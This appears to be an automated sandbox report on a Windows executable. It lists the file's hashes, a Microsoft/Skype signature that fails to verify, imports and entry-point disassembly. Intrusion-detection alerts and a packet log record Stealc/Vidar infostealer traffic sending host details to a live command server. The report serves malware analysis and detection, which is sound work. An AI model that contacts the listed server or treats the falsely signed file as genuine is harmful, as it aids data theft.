                                                                                                                                                                                                                                                                                                                                    SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                                                                    SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.97857391780465
                                                                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                                    File name:6684V5n83w.exe
                                                                                                                                                                                                                                                                                                                                    File size:1'160'471 bytes
                                                                                                                                                                                                                                                                                                                                    MD5:53c60d599aa498ed4efa79ba0b12e29f
                                                                                                                                                                                                                                                                                                                                    SHA1:969a751e4c24b9e4487ff62908b230dd554a2acc
                                                                                                                                                                                                                                                                                                                                    SHA256:8dcce53ea838f3f97b8aff36e0a1ffd70aeb1de6b8c6e5d6b530499a07e59fce
                                                                                                                                                                                                                                                                                                                                    SHA512:37a8321ddf2389a12ba014f721c6cd361f3437be1abce99d8e1a6f3337297dc78591f0e930411a279e2e4cef14792c0290581e5009d748b413d44b97da9ad53e
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:C93RugwQd6647Do+IyenPiAwqmwVcnqlaZqvLGTK10:4Rugw/hAWqmXqc4e
                                                                                                                                                                                                                                                                                                                                    TLSH:2435238987C4C113E5679E3111BDC862697AB5A74C19940F1388EEDA38237D1EE38B7F
                                                                                                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8.....
                                                                                                                                                                                                                                                                                                                                    Icon Hash:b3f0f4e6e4be9800
                                                                                                                                                                                                                                                                                                                                    Entrypoint:0x403883
                                                                                                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                    Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                                                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                                                                                                                                    Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                                                                                                                    • 24/04/2024 22:20:25 19/04/2025 22:20:25
                                                                                                                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                                                                                                                    • CN=Skype Software Sarl, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                                                                                                                    Thumbprint MD5:DCACFC48C220E288EE97E70A6850405C
                                                                                                                                                                                                                                                                                                                                    Thumbprint SHA-1:F05F9F4EA0A299F5AD361A9F96D5D57DD3B17D8B
                                                                                                                                                                                                                                                                                                                                    Thumbprint SHA-256:1C2B9B164269689BB5348EAAF60345BF635B32FD61B0230420C8BE7F94B3C56B
                                                                                                                                                                                                                                                                                                                                    Serial:33000003DDA34EC21B604513590000000003DD
                                                                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                                                                                                                    xor ebp, ebp
                                                                                                                                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                                                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                                                    mov dword ptr [esp+10h], 00409268h
                                                                                                                                                                                                                                                                                                                                    mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                                                    call dword ptr [00408030h]
                                                                                                                                                                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                                                                                                                                                                    call dword ptr [004080B4h]
                                                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                                                    call dword ptr [004082C0h]
                                                                                                                                                                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                                                                                                                                                                    mov dword ptr [00472EB8h], eax
                                                                                                                                                                                                                                                                                                                                    call 00007F15B8C6383Bh
                                                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                                                    push 000002B4h
                                                                                                                                                                                                                                                                                                                                    mov dword ptr [00472DD0h], eax
                                                                                                                                                                                                                                                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                                                    push 00409264h
                                                                                                                                                                                                                                                                                                                                    call dword ptr [00408184h]
                                                                                                                                                                                                                                                                                                                                    push 0040924Ch
                                                                                                                                                                                                                                                                                                                                    push 0046ADC0h
                                                                                                                                                                                                                                                                                                                                    call 00007F15B8C6351Dh
                                                                                                                                                                                                                                                                                                                                    call dword ptr [004080B0h]
                                                                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                                                                    mov edi, 004C30A0h
                                                                                                                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                                                                                                                    call 00007F15B8C6350Bh
                                                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                                                    call dword ptr [00408134h]
                                                                                                                                                                                                                                                                                                                                    cmp word ptr [004C30A0h], 0022h
                                                                                                                                                                                                                                                                                                                                    mov dword ptr [00472DD8h], eax
                                                                                                                                                                                                                                                                                                                                    mov eax, edi
                                                                                                                                                                                                                                                                                                                                    jne 00007F15B8C60E0Ah
                                                                                                                                                                                                                                                                                                                                    push 00000022h
                                                                                                                                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                                                                                                                                    mov eax, 004C30A2h
                                                                                                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                                                                    call 00007F15B8C631E1h
                                                                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                                                                    call dword ptr [00408260h]
                                                                                                                                                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                                                                                                                                                    mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                                                    jmp 00007F15B8C60E93h
                                                                                                                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                                                                                                                    pop ebx
                                                                                                                                                                                                                                                                                                                                    cmp ax, bx
                                                                                                                                                                                                                                                                                                                                    jne 00007F15B8C60E0Ah
                                                                                                                                                                                                                                                                                                                                    add esi, 02h
                                                                                                                                                                                                                                                                                                                                    cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                                                    • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000xc8ce.rsrc
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x118cf70x2820
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                                    .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                    .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                    .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                    .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                    .rsrc0xf40000xc8ce0xca0026251fae843031de586a0a803b86fdd1False0.9064820544554455data7.646763975980649IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                    .reloc0x1010000xf320x100010c79edbd8bfd9b535bc7dd881c68ef2False0.6005859375data5.52875900076339IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                                    RT_ICON0xf41f00x7411PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005384848382863
                                                                                                                                                                                                                                                                                                                                    RT_ICON0xfb6040x26e0PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001105305466238
                                                                                                                                                                                                                                                                                                                                    RT_ICON0xfdce40x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.604759967453214
                                                                                                                                                                                                                                                                                                                                    RT_DIALOG0x10034c0x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                                                                                    RT_DIALOG0x10044c0x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                                                                                    RT_DIALOG0x1005680x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                                                                                    RT_GROUP_ICON0x1005c80x30dataEnglishUnited States0.875
                                                                                                                                                                                                                                                                                                                                    RT_MANIFEST0x1005f80x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                                                                                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                                                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                                                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                                                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                                                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                    2024-12-31T09:46:06.356202+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.549990116.203.14.4443TCP
                                                                                                                                                                                                                                                                                                                                    2024-12-31T09:46:09.022559+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.14.4443192.168.2.549993TCP
                                                                                                                                                                                                                                                                                                                                    2024-12-31T09:46:10.344422+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.549995116.203.14.4443TCP
                                                                                                                                                                                                                                                                                                                                    2024-12-31T09:46:10.344648+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.14.4443192.168.2.549995TCP
                                                                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:05.877044916 CET4434971440.113.103.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:05.919743061 CET49714443192.168.2.540.113.103.199
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:08.247874975 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:08.247878075 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:08.529130936 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:12.551944017 CET49715443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:12.551980972 CET4434971540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:12.552057981 CET49715443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:12.553785086 CET49715443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:12.553801060 CET4434971540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.465308905 CET4434971540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.465440989 CET49715443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.551568985 CET49715443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.551589966 CET4434971540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.551979065 CET4434971540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.591567039 CET49715443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.608159065 CET49715443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.608293056 CET49715443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.608300924 CET4434971540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.608726025 CET49715443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.655332088 CET4434971540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.788747072 CET4434971540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.789014101 CET4434971540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.789071083 CET49715443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.789226055 CET49715443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:13.789247036 CET4434971540.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:17.857147932 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:17.857296944 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:18.138408899 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:19.769005060 CET4434971123.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:19.769138098 CET49711443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:22.866275072 CET49752443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:22.866324902 CET4434975240.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:22.866491079 CET49752443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:22.867384911 CET49752443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:22.867400885 CET4434975240.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.650240898 CET4434975240.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.650305986 CET49752443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.652898073 CET49752443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.652910948 CET4434975240.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.653202057 CET4434975240.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.655757904 CET49752443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.655821085 CET49752443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.655827999 CET4434975240.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.656019926 CET49752443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.703325987 CET4434975240.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.831275940 CET4434975240.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.831482887 CET4434975240.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.831588030 CET49752443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.831747055 CET49752443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:23.831770897 CET4434975240.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:41.538466930 CET49866443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:41.538521051 CET4434986640.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:41.538618088 CET49866443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:41.539262056 CET49866443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:41.539273977 CET4434986640.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.429089069 CET4434986640.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.429224968 CET49866443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.468894958 CET49866443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.468921900 CET4434986640.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.469249010 CET4434986640.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.513431072 CET49866443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.727946043 CET49866443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.728008032 CET49866443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.728018999 CET4434986640.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.728285074 CET49866443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.775329113 CET4434986640.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.904603958 CET4434986640.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.904686928 CET4434986640.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.904761076 CET49866443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.905036926 CET49866443192.168.2.540.115.3.253
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:42.905050039 CET4434986640.115.3.253192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:02.288842916 CET49988443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:02.288881063 CET44349988149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:02.289212942 CET49988443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:02.293088913 CET49988443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:02.293097019 CET44349988149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:02.913120985 CET44349988149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:02.913270950 CET49988443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:03.298053980 CET49988443192.168.2.5149.154.167.99
